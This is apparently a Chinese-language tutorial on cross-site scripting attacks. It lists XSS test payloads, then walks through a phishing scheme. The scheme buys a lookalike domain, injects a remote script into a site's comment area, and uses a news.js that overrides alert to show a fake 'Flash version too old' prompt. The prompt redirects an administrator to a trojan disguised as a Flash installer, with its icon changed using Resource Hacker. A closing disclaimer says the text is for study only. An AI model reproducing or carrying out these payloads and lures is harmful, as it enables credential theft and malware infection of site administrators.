0x01 找到存在注入的目標站點
2、檢測方法
通常有一些方式可以測試網站是否有正確處理特殊字符:
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert (vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
<img src="http://888.888.com/999.png" onerror="alert('XSS')">
<div style="height:expression(alert('XSS'),1)"></div>
(這個僅於IE7(含)之前有效)
2、攻擊思路
站點含有Xss漏洞,但現在大部分站點都使用了Httponly,因此暫且無法劫持Cookie。此時可以進行Xss釣魚,偽造登陸界面,獲取管理賬號密碼,提升權、訪問量極大的一些頁面上的XSS可以攻擊一些小型網站,實現DOS攻擊的效果.
修改官方頁面源碼
設計好用於迷惑目標點擊觸發的頁面,購買一個相似的域名。把腳本代碼插入到留言或者可以與目標活動的地方。
<script src="https://www.test.flash.com/news.js"> </script>
news.js
window.alert = function(name){ var iframe = document. createElement("IFRAME"); iframe.style.display="none"; iframe.setAttribute("src",'data:text/plain,'); document. documentElement.appendChild(iframe); window.frames [0].window.alert(name); iframe.parentNode.removeChild(iframe); } alert( "您的FLASH版本過低,嘗試升級后訪問該頁面! "); window. location.href="http://www.test.com";
管理員查看留言回復時彈出提示,點擊便會下載運行后便會觸發木馬程序
跳轉到我們捆綁好木馬的flash下載地址
0x02捆綁木馬制作
、
修改文件圖標 使用工具
下載地址:http://www.angusj.com/resourcehacker/#download
完成后文件可以自解壓然后運行
目標觸發木馬獲取到權限后可以修改news.js,此時網頁不再可訪。
嚴格遵守網絡安全法,請勿用於其他非法途徑!此文用於學習交流。